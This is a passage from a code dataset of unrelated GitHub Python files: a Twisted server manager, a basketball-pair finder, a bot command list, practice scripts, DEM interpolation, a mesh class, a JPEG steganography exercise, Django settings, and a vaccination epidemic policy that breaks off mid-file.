+{"seq_id":"74038898669","text":"from twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet import reactor\nfrom MessageManagers.MessageDispatcher import MessageDispatcherFactory\nfrom MessageManagers.SendMessage import MessageSenderFactory\nfrom CommandMessageGenerators.MessageGenerator import StringMessageGenerator\nfrom CommandMessageGenerators.MessageRepeat import MsgMonitor\nfrom CommandMessageGenerators.ExpMessageGenerator import ReceiveExpNode\nfrom Utilities.Const import *\nfrom Utilities.FileInputTokenize import ArgFIP\nfrom Utilities.FileUtil import expprint, setFileName, OUTFOLDER, getDFilePath, getPFilePath\nimport threading\nimport time\nimport sys\nimport uuid\n\nclass outgoer():\n def __init__(self, ip, port, fact):\n self.ip = ip\n self.port = port\n self.fact = fact\n\n def call(self):\n reactor.connectTCP(self.ip, self.port, self.fact)\n\nclass PlatformManager():\n def __init__(self, in_my_IP, in_my_Port, location):\n self.IP = in_my_IP\n self.Port = in_my_Port\n self.reactorFileConfirmers = []\n self.msgmon = MsgMonitor()\n self.idval = str(uuid.uuid4())\n setFileName(self.idval)\n self.templogfilenames = []\n self.location = location\n\n def ManagerThreadRun(self):\n dbgprint(\"bad way\")\n raise NotImplementedError(\"Abstract method\")\n\n def StartAll(self):\n self.StartServer()\n self.StartManager()\n def StartServer(self):\n #from Utilities.Const import * ##\n self.serverThread = threading.Thread(target=self.ServerThreadRun)\n self.serverThread.start()\n def StartManager(self):\n #from Utilities.Const import * ##\n dbgprint(\"starting mngr\")\n self.managerThread = threading.Thread(target=self.ManagerThreadRun)\n self.managerThread.start()\n\n def SafeStopServer(self):\n dbgprint(\"SafeStopCalled\")\n reactor.callFromThread(reactor.stop)\n self.msgmon.terminate()\n\n def ServerThreadRun(self):\n\n endpoint = TCP4ServerEndpoint(reactor, self.Port)\n endpoint.listen(MessageDispatcherFactory(self))\n dbgprint(\"server starting...\")\n reactor.run(installSignalHandlers=0)\n\n def ReactorReceiverAdd(self, filerec):\n dbgprint(\"added filerec\")\n self.reactorFileConfirmers.append(filerec)\n\n def ReactorFileSent(self, filename, transp):\n dbgprint(\"Reactor File Sent\")\n self.reactorFileConfirmers[:] = [x for x in self.reactorFileConfirmers if x.FileResponded(filename, transp)]\n\n def storeLog(self, vals):\n afilename = str(uuid.uuid4())\n v = vals.replace(\"\\t\", \"\\n\") \n if(afilename in self.templogfilenames):\n expprint(\"BADFILENAME!!\")\n self.templogfilenames.append(afilename)\n with open(afilename, 'w') as afile:\n afile.write(v)\n\n def compilelogs(self):\n expprint(\"Compiling \" + str(len(self.templogfilenames)) + \" logs\\n\")\n for filename in self.templogfilenames:\n if(self.templogfilenames.count(filename) > 1):\n expprint(\"found dup\\n\");\n for filename in self.templogfilenames:\n with open(filename, 'r') as afile:\n for line in afile:\n expprint(line +\"\\n\")\n os.remove(filename)\n dbgprint(\"Logs Compiled To \"+OUTFOLDER+str(self.idval))\n\n def dumpLogToStdOut(self):\n filename = OUTFOLDER+\"/\"+str(self.idval)\n with open(filename, 'r') as afile:\n for line in afile:\n print (line + \"\\n\") ##\n\n def getPFileName(self):\n return getPFilePath()\n\n def getDFileName(self):\n return getDFilePath()\n","repo_name":"Shifat11420/CloudPlatform","sub_path":"Platformv5/Platform/PlatformManager.py","file_name":"PlatformManager.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21112038120","text":"import requests\r\nfrom collections import defaultdict\r\n\r\n# loadData: takes a URL and headers parameters for getting info from the URL endpoint\r\n# parameter URL: this is the endpoint where the data is located in JSON format\r\n# parameter headers: There is no need of headers for accessing this data, so it will be empty\r\ndef loadData(URL,header) :\r\n # making the info request to the endPoint\r\n URLrequest=requests.get(URL,headers=header)\r\n #storing the information to \"result\" variable\r\n result=URLrequest.json()\r\n return result\r\n# takes the input from console of height\r\ndef getInput():\r\n while True:\r\n try :\r\n result = int(input(\"Introduce height in inches adds up to:\"))\r\n break\r\n except ValueError:\r\n print(\"Please introduce a number\")\r\n return result\r\n\r\n# parameters:\r\n# data: Dictionary with players Info\r\n# totalHeight: the total height of the players' pair\r\ndef createHeightDictionary(data, totalHeight):\r\n # create an empty dictionary with heights\r\n dictPairs = defaultdict(list)\r\n # check if\r\n print(type(dictPairs))\r\n for player in data:\r\n try:\r\n # takes playerHeight of each player record and validates data quality\r\n playerHeight = int(player['h_in'])\r\n except ValueError:\r\n print(\"Height is not an integer value on player:\" + player['first_name'] + \" \" + player['last_name'])\r\n\r\n # add player to the dictionary\r\n dictPairs[playerHeight].append(player['first_name'] + \" \" + player['last_name'])\r\n # print(dictPairs)\r\n\r\n return dictPairs\r\n# program starting point\r\ntotalHeight = getInput()\r\n \r\n# url hardcoded\r\nurl='https://mach-eight.uc.r.appspot.com'\r\n# load data into result (as a dcitionary) variable from url\r\nDataresult=loadData(url,{})\r\nprint(type(Dataresult))\r\nfor data in Dataresult['values'] :\r\n print(data)\t\t\r\n\r\nplayersHeight = createHeightDictionary(Dataresult['values'],totalHeight)\r\nprint(playersHeight)\r\n# search pairs depends on each heigh against another player\r\nprint(\"The pairs of basketball players that added up:[\"+ str(totalHeight)+\"] inches are:\")\r\nfor height in playersHeight:\r\n # print(height)\r\n if totalHeight - height in playersHeight:\r\n for otherPlayer in playersHeight[totalHeight - height] :\r\n for player in playersHeight[height]:\r\n #print(\"player:\"+player)\r\n if player < otherPlayer:\r\n print(\"[\"+player + \" - \" + otherPlayer+\"]\")\r\n ","repo_name":"jriosfer/Playerspairs","sub_path":"getPairs.py","file_name":"getPairs.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33882337144","text":"from aiogram.types import BotCommand\n\nBOT_COMMAND_LIST = (\n (\"start\", \"Запустить бота\"),\n (\"suggest\", \"Предложить пароль\"),\n (\"logout\", \"Выйти\"),\n (\"help\", \"Помощь\"),\n (\"about\", \"О боте\"),\n)\n\nBOT_COMMANDS = [\n BotCommand(command=name, description=desc) for name, desc in BOT_COMMAND_LIST\n]\n\nBOT_COMMANDS_STR = \"\\n\".join(\"/\" + (\" - \".join(cmd)) for cmd in BOT_COMMAND_LIST)\n","repo_name":"everysoftware/secrets","sub_path":"bot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"40316526464","text":"#딕셔너리 선언\nd={'과목1':'자료구조','과목2':'컴논개'}\n\n#삽입\nd['과목3']='데이터구조'\nd['과목4']='컴개실'\nprint(d)\n\n#ADT 활용 예시\nGet=d.get('과목1')\nShow=d.values()\nKeysList=list(d.keys())\nValuesList=list(d.values())\nTuple_d=d.items()\nprint(f' Get={Get} \\n Show={Show} \\n KeysList={KeysList} \\n ValuesList={ValuesList} \\n Tuple_d={Tuple_d}')\n\nprint()\n#집합 선언\ns={0,1,2}\n\ns.add(4)\ns.update([10,6])\ns.remove(0)\nlength=len(s)\n\nt={0,1,2,20}\nUnion=s.union(t)\nIntersection=s.intersection(t)\nDifference=s.difference(t)\n\nprint(f'집합 : {s} \\nUnion : {Union} \\nIntersection : {Intersection} \\nDifference : {Difference}')\n\n\n#comprehension\na = []\nfor x in range(31):\n if x % 3 ==0:\n a.append(x)\n\n#a=[x for in range(31) if x%3==0]\n\n\ndef add(*args):\n sum=0\n for x in args:\n sum+=x\n return sum\nprint(add(3,4,5,6))\n\n\ndef say_myself(name, old, man=True):\n print(\"나의 이름은 %s 입니다\" %name)\n print(\"나이는 %d 살 입니다.\" %old)\n if man:\n print(\"남자입니다.\")\n else:\n print(\"여자입니다.\")\n\n\ndef increase1(x):\n x +=1\n\nx=10\nincrease1(x)\nprint(x)\n\ns=[]\ns.append(3)\ns.extend('4')\ns.extend({5:6, 7:8})\nprint(s)\n\naa=s.copy()\nprint(aa,\"\\n\")\nstring= \"hello world\"\ntu=(1,2,3,4)\nprint(max(string))\nprint(max(tu))","repo_name":"Againyunn/Python-Study","sub_path":"DataStructure/수업내용/PythonReview/자료형 연습.py","file_name":"자료형 연습.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15277613728","text":"#!/usr/bin/env python\n\n# inst: university of bristol\n# auth: jeison sosa\n# mail: j.sosa@bristol.ac.uk / sosa.jeison@gmail.com\n\nfrom sys import exit\nimport subprocess\nimport numpy as np\nimport gdalutils as gu\n\nos = 'osx'\nvoid_demf = 'lidar_england_50m.tif'\nfill_demf = 'OS_terrain_50.tif'\nnodata = -9999 # non data value in both datasets\n\n# Calculate delta surface with voids\ndef step_01():\n\n geo = gu.get_geo(void_demf)\n void_dem = gu.get_data(void_demf)\n fill_dem = gu.get_data(fill_demf)\n delta_surf = void_dem - fill_dem\n\n delta_surf[(delta_surf>=8000) | (delta_surf<=-8000)] = nodata\n delta_surf[delta_surf==0] = nodata\n\n gu.write_raster(delta_surf,'delta_surf_wt_voids.tif',geo,'Float64',nodata)\n\n# Create list of source points to interpolate\ndef step_02():\n\n subprocess.call(['gdal_translate','-of','XYZ','delta_surf_wt_voids.tif','delta_surf_wt_voids.xyz'])\n subprocess.call(['sed','s/ /,/g','delta_surf_wt_voids.xyz'],stdout=open('delta_surf_wt_voids.csv','w'))\n if os == 'osx':\n subprocess.call(['sed','-i','','/-9999/d','delta_surf_wt_voids.csv'])\n elif os == 'linux':\n subprocess.call(['sed','-i','/-9999/d','delta_surf_wt_voids.csv'])\n else:\n print('OS not identified')\n exit(0)\n\n f = open('delta_surf_wt_voids.vrt','w')\n f.write(''+'\\n')\n f.write(' '+'\\n')\n f.write(' delta_surf_wt_voids.csv '+'\\n')\n f.write(' wkbPoint '+'\\n')\n f.write(' '+'\\n')\n f.write(' '+'\\n')\n f.write(' '+'\\n')\n f.close()\n\n# Interpolation\ndef step_03():\n\n geo = gu.get_geo(void_demf)\n nx = geo[4]\n ny = geo[5]\n xmin = geo[0]\n xmax = geo[2]\n ymin = geo[1]\n ymax = geo[3]\n\n subprocess.call(['gdal_grid','--config','GDAL_NUM_THREADS','ALL_CPUS',\n '-a','invdist',\n '-of','GTiff',\n '-ot','Float64',\n '-txe', str(xmin), str(xmax),\n '-tye', str(ymin), str(ymax),\n '-outsize', str(nx), str(ny),\n '-l','delta_surf_wt_voids',\n 'delta_surf_wt_voids.vrt','delta_surf_interp.tif'])\n\n# Get final raster\ndef step_04():\n\n A = gu.get_data('delta_surf_interp.tif')\n B = gu.get_data(fill_demf)\n C = gu.get_data(void_demf)\n geo = gu.get_geo(void_demf)\n mysum = A+B\n final = np.where(C==nodata,mysum,C)\n \n final[(final>=8000) | (final<=-8000)] = nodata\n gu.write_raster(final,'dem.tif',geo,'Float64',nodata)\n\n# Running the program\ndef main():\n step_01()\n step_02()\n step_03()\n step_04()\nmain()\n","repo_name":"jsosa/delta_surf_method","sub_path":"delta_surface_method.py","file_name":"delta_surface_method.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"17533590366","text":"from classy_blocks.construct import edges\nfrom classy_blocks.construct.flat.face import Face\nfrom classy_blocks.construct.operations.loft import Loft\nfrom classy_blocks.types import VectorType\n\n\nclass Revolve(Loft):\n \"\"\"Takes a Face and revolves it by angle around axis;\n axis can be translated so that it goes through desired origin.\n\n Angle is given in radians,\n revolve is in positive sense (counter-clockwise - right hand rule)\"\"\"\n\n def __init__(self, base: Face, angle: float, axis: VectorType, origin: VectorType):\n self.base = base\n self.angle = angle\n self.axis = axis\n self.origin = origin\n\n bottom_face = base\n top_face = base.copy().rotate(angle, axis, origin)\n\n super().__init__(bottom_face, top_face)\n\n # there are 4 side edges: the simplest is to use 'axis and angle'\n for i in range(4):\n self.add_side_edge(i, edges.Angle(self.angle, self.axis))\n","repo_name":"damogranlabs/classy_blocks","sub_path":"src/classy_blocks/construct/operations/revolve.py","file_name":"revolve.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"38"}
+{"seq_id":"71622050671","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 25 14:34:05 2021\n\n@author: tjoeun\n\"\"\"\ndef fibo_print(n):\n 'n미만의 피보나치 수열 print'\n for i in fibo_return(n):\n print(i, end=' ')\n print()\n \n\ndef fibo_return(n):\n 'n미만의 피보나치 수열 리스트 리턴'\n result = []\n a,b=0,1 \n while(aB\", val))\n\n def writeshort(val):\n buf.extend(struct.pack(\">H\", val))\n\n # SOI\n writeshort(0xFFD8) # SOI marker\n\n # APP0\n writeshort(0xFFE0) # APP0 marker\n writeshort(0x0010) # segment length\n writebyte(0x4A) # 'J'\n writebyte(0x46) # 'F'\n writebyte(0x49) # 'I'\n writebyte(0x46) # 'F'\n writebyte(0x00) # '\\0'\n writeshort(0x0101) # v1.1\n writebyte(0x00) # no density unit\n writeshort(0x0001) # X density = 1\n writeshort(0x0001) # Y density = 1\n writebyte(0x00) # thumbnail width = 0\n writebyte(0x00) # thumbnail height = 0\n\n # DQT\n quant_table = quant_table.reshape(-1)\n writeshort(0xFFDB) # DQT marker\n writeshort(0x0043) # segment length\n writebyte(0x00) # table 0, 8-bit precision (0)\n for index in constants.zz:\n writebyte(quant_table[index])\n\n # SOF0\n writeshort(0xFFC0) # SOF0 marker\n writeshort(0x000B) # segment length\n writebyte(0x08) # 8-bit precision\n writeshort(img_height)\n writeshort(img_width)\n writebyte(0x01) # 1 component only (grayscale)\n writebyte(0x01) # component ID = 1\n writebyte(0x11) # no subsampling\n writebyte(0x00) # quantization table 0\n\n # DHT\n writeshort(0xFFC4) # DHT marker\n writeshort(19 + constants.dc_nb_vals) # segment length\n writebyte(0x00) # table 0 (DC), type 0 (0 = Y, 1 = UV)\n for node in constants.dc_nodes[1:]:\n writebyte(node)\n for val in constants.dc_vals:\n writebyte(val)\n\n writeshort(0xFFC4) # DHT marker\n writeshort(19 + constants.ac_nb_vals)\n writebyte(0x10) # table 1 (AC), type 0 (0 = Y, 1 = UV)\n for node in constants.ac_nodes[1:]:\n writebyte(node)\n for val in constants.ac_vals:\n writebyte(val)\n\n # SOS\n writeshort(0xFFDA) # SOS marker\n writeshort(8) # segment length\n writebyte(0x01) # nb. components\n writebyte(0x01) # Y component ID\n writebyte(0x00) # Y HT = 0\n # segment end\n writebyte(0x00)\n writebyte(0x3F)\n writebyte(0x00)\n\n return buf\n\ndef embed(msg_file, cover_img_file, quant_table, stego_img_file):\n '''\n Nhúng tin mật vào ảnh jpeg (lossy) bằng phương pháp LSB với k = 1 \n (xem file slide \"07-AnTinMatTrenAnh3.pdf\", trang 13).\n Để đơn giản, ở đây ta sẽ giả định: ảnh là ảnh xám, \n có chiều dài và chiều rộng chia hết cho 8.\n \n Các tham số:\n msg_file (str): Tên file chứa secret message.\n cover_img_file (str): Tên file chứa cover image.\n quant_table (mảng numpy 8x8): Bảng quantization (bảng các số chia ở bước quantization).\n stego_img_file (str): Tên file (*.jpg) chứa stego image (kết quả sau khi nhúng).\n Giá trị trả về:\n bool: True nếu nhúng thành không, False nếu không đủ chỗ để nhúng. \n '''\n # I. Đọc cover img file\n # YOUR CODE HERE\n\n cover_img = Image.open(cover_img_file)\n cover_pixels = np.array(cover_img,dtype=int)\n width, height = cover_img.size\n max_bits_per_block = 26\n \n \n # II. Đọc msg file, chuyển msg thành msg bits, kiểm xem có đủ chỗ nhúng không, thêm 100... vào msg bits\n # YOUR CODE HERE\n \n # Đọc msg file\n with open(msg_file, 'r') as f:\n msg = f.read()\n msg_bits = bitarray()\n msg_bits.frombytes(msg.encode('utf-8'))\n \n # Kiểm xem có nhúng được không?\n capacity = max_bits_per_block*(cover_pixels.size//64)\n if len(msg_bits) + 1 > capacity:\n return False\n\n # Thêm '100...' vào msg bits\n msg_bits.extend('1' + '0' * (capacity - len(msg_bits) - 1))\n\n # III. Nén jpeg, trong quá trình nén thực hiện nhúng msg bits\n jpeg_bytes = bytearray()\n jpeg_bytes.extend(get_header(height, width, quant_table))\n huf = Huffman()\n \n # Lần lượt duyệt các khối ảnh 8x8 (theo thứ tự từ trái qua phải, từ trên xuống dưới)\n # Với mỗi khối:\n # (1) Trừ 128 rồi tính các hệ số DCT\n # (2) Tính các hệ số quantized DCT\n # (3) Nhúng msg bits vào các hệ số quantized DCT\n # (4) Nén các hệ số quantized DCT bằng thuật toán nén Huffman\n # Để nén dùng câu lệnh `huf.encode_block(quant_dct_coefs, length)`\n # Trong đó: \n # - `quant_dct_coefs` là mảng 1 chiều các hệ số quantized DCT \n # (có được bằng cách duyệt mảng 2 chiều theo thứ tự dích dắc:\n # đầu tiên, kéo mảng 2 chiều thành mảng một chiều, \n # rồi duyệt mảng một chiều này theo mảng chỉ số `constants.zz` đã được định nghĩa sẵn cho bạn)\n # - `length` là số lượng phần tử của mảng `quant_dct_coefs` tính\n # từ phần tử đầu cho đến phần tử khác 0 cuối cùng \n # (lưu ý: có thể xảy ra trường hợp tất cả phần tử đều bằng 0)\n # YOUR CODE HERE\n \n k = 0 #duyệt từng bits\n\n #vị trí nhúng sau khi chuyển về mảng một chiều\n embed_index = [\n 4 , 5 , 6 , 7 ,\n 11, 12, 13, 14,\n 18, 19, 20, 21,\n 25, 26, 27, 28,\n 32, 33, 34, 35,\n 40, 41, 42,\n 48, 49,\n 56\n ]\n\n # cover_pixels.size = 8*8*blocks \n # chia ảnh thành các khối 8x8\n for r in range(0,cover_pixels.shape[0] - 8 + 1, 8):\n for c in range(0,cover_pixels.shape[1] - 8 + 1, 8):\n block = cover_pixels[r:r+8,c:c+8]\n # (1) Trừ 128 rồi tính các hệ số DCT\n dct = dct2(block - 128)\n # (2) Tính các hệ số quantized DCT\n quantized = np.array(np.round(dct / quant_table), dtype=int)\n # (3) Nhúng msg bits vào các hệ số quantized DCT\n # Đưa về mảng 1 chiều\n quantized = quantized.flatten()\n # Nhúng msg_bits\n\n for idx in embed_index:\n quantized[idx] = ((quantized[idx]>>1<<1) | int(msg_bits[k]))\n k += 1\n \n \n # (4) Nén các hệ số quantized DCT bằng thuật toán nén Huffman\n # duyệt theo dạng zig-zag thành từng block rồi thêm block vào quant_dct_coefs\n \n quant_dct_coefs = []\n for i in constants.zz:\n quant_dct_coefs.append(quantized[i])\n\n try:\n # Lấy số lượng phần tử của mảng `quant_dct_coefs` tính từ phần tử đầu cho đến phần tử khác 0 cuối cùng \n length = np.max(np.nonzero(quant_dct_coefs)) + 1\n huf.encode_block(quant_dct_coefs, length)\n except:\n pass\n \n \n # Kết thúc encode và lấy buffer cho vào jpeg_bytes\n jpeg_bytes.extend(huf.end_and_get_buffer())\n jpeg_bytes.extend(struct.pack(\">H\", 0xFFD9)) # EOI marker\n \n\n # IV. Ghi kết quả nén jpeg xuống file\n with open(stego_img_file, 'wb') as f:\n f.write(jpeg_bytes)\n\n return True\n\n# TEST\nquant_table = np.array([\n 16, 11, 10, 16, 1, 1, 1, 1,\n 12, 12, 14, 1, 1, 1, 1, 55,\n 14, 13, 1, 1, 1, 1, 69, 56,\n 14, 1, 1, 1, 1, 87, 80, 62,\n 1, 1, 1, 1, 68, 109, 103, 77,\n 1, 1, 1, 64, 81, 104, 113, 92,\n 1, 1, 78, 87, 103, 121, 120, 101,\n 1, 92, 95, 98, 112, 100, 103, 99\n]).reshape(8, 8)\n# result = embed('msg2.txt', 'cover.bmp', quant_table, 'stego.jpg')\n# assert result == False\n\n# TEST\nresult = embed('msg.txt', 'cover.bmp', quant_table, 'stego.jpg')\nassert result == True\n\n# assert np.all(np.array(Image.open('stego.jpg')) == np.array(Image.open('correct_stego.jpg')))\n\n\na = np.array(Image.open('stego.jpg'))\nb = np.array(Image.open('correct_stego.jpg'))\n\nwith open('arr.txt','w') as f:\n for i in range(a.shape[0]):\n for j in range(a.shape[1]):\n f.write(str(a[i,j]) + ' ')\n f.write('\\n')\nwith open('arr2.txt','w') as f:\n for i in range(b.shape[0]):\n for j in range(b.shape[1]):\n f.write(str(b[i,j]) + ' ')\n f.write('\\n')\n\n\n# print(a)\n# print(b)","repo_name":"trinhvanminh/An-Du-Lieu","sub_path":"Bai Tap Da Nop/BT03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40247697598","text":"# coding: utf-8\n\nfrom .base import *\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nINSTALLED_APPS = INSTALLED_APPS + ('debug_toolbar', )\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n 'level': 'INFO',\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n","repo_name":"hacklabr/mapasculturais-openid","sub_path":"iddacultura/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"34967534100","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom policies.policy import Policy\nfrom utils.history_utils import TimeSeries\nimport logging\n\nfrom models.agent_based_network_model import STATES\nfrom utils.config_utils import ConfigFile\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef _process_calendar(filename):\n df = pd.read_csv(filename)\n return (\n dict(zip(df[\"T\"], df[\"workers\"].astype(int))),\n dict(zip(df[\"T\"], df[\"elderly\"].astype(int))),\n )\n\n\nclass Vaccination(Policy):\n\n \"\"\"\n Vaccination Policy.\n \"\"\"\n\n def __init__(self, graph, model, config_file=None):\n super().__init__(graph, model)\n\n self.first_day = True\n self.stopped = False\n self.delay = None\n\n # -1 .. not vaccinated\n # >= 0 days from vaccination\n self.vaccinated = np.full(\n self.graph.num_nodes, fill_value=-1, dtype=int)\n self.nodes = np.arange(self.graph.num_nodes)\n self.days_in_E = np.zeros(self.graph.num_nodes, dtype=int)\n self.target_for_R = np.zeros(\n self.graph.num_nodes, dtype=bool) # auxiliary var\n\n # statistics\n self.stat_moved_to_R = TimeSeries(401, dtype=int)\n\n if config_file:\n cf = ConfigFile()\n cf.load(config_file)\n calendar_filename = cf.section_as_dict(\n \"CALENDAR\").get(\"calendar_filename\", None)\n if calendar_filename is None:\n raise \"Missing calendar filename in vaccination policy config file.\"\n self.workers_calendar, self.elderly_calendar = _process_calendar(\n calendar_filename)\n self.delay = cf.section_as_dict(\"CALENDAR\").get(\"delay\", None)\n\n self.first_shot_coef = cf.section_as_dict(\"EFFECT\")[\"first_shot\"]\n self.second_shot_coef = cf.section_as_dict(\"EFFECT\")[\"second_shot\"]\n else:\n raise \"Vaccination policy requires config file.\"\n\n self.old_to_vaccinate = list(np.argsort(self.graph.nodes_age))\n # self.index_to_go = len(self.sort_indicies)-1\n\n worker_id = self.graph.cat_table[\"ecactivity\"].index(\"working\")\n self.workers_to_vaccinate = list(\n self.nodes[self.graph.nodes_ecactivity == worker_id])\n # print(self.workers_to_vaccinate)\n # exit()\n\n def first_day_setup(self):\n pass\n\n def stop(self):\n \"\"\" just finish necessary, but do nothing new \"\"\"\n self.stopped = True\n\n def move_to_S(self):\n # take those who are first day E (are E AND are E the first day)\n nodes_first_E = (self.model.memberships[STATES.E] == 1).ravel()\n self.days_in_E[nodes_first_E] += 1\n nodes_first_E = np.logical_and(\n nodes_first_E,\n self.days_in_E == 1\n )\n\n if nodes_first_E.sum() == 0:\n return\n\n # By 14 days after the first shot, the effect is zero (i.e. an\n # infectedindividual becomes exposed and later symptomatic or asymptomaticas if\n # not vaccinated)•Between 14 and 20 days after the first shot, those, who are\n # infected(heading to theEcompartment) and are \"intended\" to be\n # asymptomatic(further go toIa, it is no harm to assume this decision is made\n # inforward) become recovered with probability0.29instead of\n # enteringtheEcompartment. Those, intended to be symptomatic (further gotoIp)\n # become recovered with0.46probability.•21days or more after first shot, this\n # probability of \"recovery\" is0.52for asymptomatic and0.6for symptomatic.•7days\n # after the second shot or later, the probability of \"recovery\" is0.9for\n # asymptomatic and0.92for symptomatic\n\n # divide nodes_first_E to asymptomatic candidates and symptomatic candidates\n # assert np.all(np.logical_or(\n # self.model.state_to_go[nodes_first_E, 0] == STATES.I_n,\n # self.model.state_to_go[nodes_first_E, 0] == STATES.I_a\n # )), \"inconsistent state_to_go\"\n\n self.target_for_R.fill(0)\n\n def decide_move_to_R(selected, prob):\n n = len(selected)\n print(f\"generating {n} randoms\")\n if n > 0:\n r = np.random.rand(n)\n self.target_for_R[selected] = r < prob\n\n # 14 - 20 days: 0.29 for A, 0.46 for S\n # skip those with < 14 days\n\n # for state, probs in (\n # (STATES.I_n, [0.29, 0.52, 0.9]),\n # (STATES.I_a, [0.46, 0.6, 0.92])\n # ):\n # nodes_heading_to_state = nodes_first_E.copy()\n # nodes_heading_to_state[nodes_first_E] = self.model.state_to_go[nodes_first_E, 0] == state\n # node_list = self.nodes[nodes_heading_to_state]\n\n # if not(len(node_list) > 0):\n # continue\n # # skip those who are in first 14 days\n # node_list = node_list[self.vaccinated[node_list] >= 14]\n # # select 14 - 21\n # selected = node_list[self.vaccinated[node_list] < 21]\n # decide_move_to_R(selected, probs[0])\n # # skip them\n # node_list = node_list[self.vaccinated[node_list] >= 21]\n # # selecte < second shot + 7\n # selected = node_list[self.vaccinated[node_list] < self.delay + 7]\n # decide_move_to_R(selected, probs[1])\n # # skip them\n # node_list = node_list[self.vaccinated[node_list] >= self.delay + 7]\n # decide_move_to_R(node_list, probs[2])\n\n # first shots\n\n node_list = self.nodes[nodes_first_E]\n\n if not(len(node_list) > 0):\n return\n\n # those who have only the first shot\n first_shotters = node_list[\n np.logical_and(\n self.vaccinated[node_list] >= 14,\n self.vaccinated[node_list] < self.delay + 7\n )]\n r = np.random.rand(len(first_shotters))\n go_back = first_shotters[r < self.first_shot_coef]\n self.target_for_R[go_back] = True\n\n second_shotters = node_list[self.vaccinated[node_list]\n >= self.delay + 7]\n r = np.random.rand(len(second_shotters))\n go_back = second_shotters[r < self.second_shot_coef]\n self.target_for_R[go_back] = True\n\n self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n self.model.move_target_nodes_to_S(self.target_for_R)\n self.days_in_E[self.target_for_R] = 0\n\n def process_vaccinated(self):\n self.move_to_S()\n\n def run(self):\n\n super().run()\n\n # update vaccinated days\n already_vaccinated = self.vaccinated != -1\n self.vaccinated[already_vaccinated] += 1\n\n self.process_vaccinated()\n\n # update asymptotic rates - OBSOLETE\n # Počítám, že první týden nemá vakcíná\n # žádnou účinnost, po týdnu 50%, po dvou týdnech 70%, po druhé\n # dávce 90% a po dalším týdnu 95%\n\n # older = self.graph.nodes_age > 65\n # younger = np.logical_not(older)\n\n # # update two weeks after first vaccination\n # selected = self.vaccinated == 14\n # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.7\n # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 0.9\n\n # # update two weeks after second vaccination\n # selected = self.vaccinated == self.delay + 14\n # self.model.asymptomatic_rate[np.logical_and(selected, older)] = 0.8\n # self.model.asymptomatic_rate[np.logical_and(selected, younger)] = 0.95\n\n # selected = self.vaccinated == 7\n # self.model.asymptomatic_rate[selected] = 0.5\n # selected = self.vaccinated == 14\n # self.model.asymptomatic_rate[selected] = 0.7\n # selected = self.vaccinated == self.delay\n # self.model.asymptomatic_rate[selected] = 0.9\n # selected = self.vaccinated == self.delay + 7\n # self.model.asymptomatic_rate[selected] = 0.95\n\n logging.debug(f\"asymptomatic rate {self.model.asymptomatic_rate.mean()}\")\n\n if self.model.T in self.elderly_calendar:\n self.vaccinate_old(self.elderly_calendar[self.model.T])\n\n if self.model.T in self.workers_calendar:\n self.vaccinate_workers(self.workers_calendar[self.model.T])\n\n def vaccinate_old(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} elderly.\")\n index = len(self.old_to_vaccinate)\n while num > 0 and index > 0:\n index -= 1\n who = self.old_to_vaccinate[index]\n if self.vaccinated[who] != -1:\n continue\n if self.model.node_detected[who]: # change to active case\n continue\n # dead are not vaccinated\n if self.model.memberships[STATES.D, who, 0] == 1:\n continue\n self.vaccinated[who] = 0\n del self.old_to_vaccinate[index]\n num -= 1\n\n def vaccinate_workers(self, num):\n if num == 0:\n return\n logging.info(f\"T={self.model.T} Vaccinating {num} workers.\")\n num_workers = len(self.workers_to_vaccinate)\n if num_workers == 0:\n return\n\n # ids_to_vaccinate = self.workers_to_vaccinate[self.model.node_detected[self.workers_to_vaccinate] == False]\n # if len(ids_to_vaccinate) == 0:\n # logging.warning(\"No more workers to vaccinate.\")\n # exit()\n # return\n # ids_to_vaccinate = ids_to_vaccinate[self.model.memberships[STATES.D, ids_to_vaccinate, 0] != 1]\n\n ids_to_vaccinate = np.logical_and(\n self.model.node_detected[self.workers_to_vaccinate] == False,\n self.model.memberships[STATES.D, self.workers_to_vaccinate, 0] != 1\n 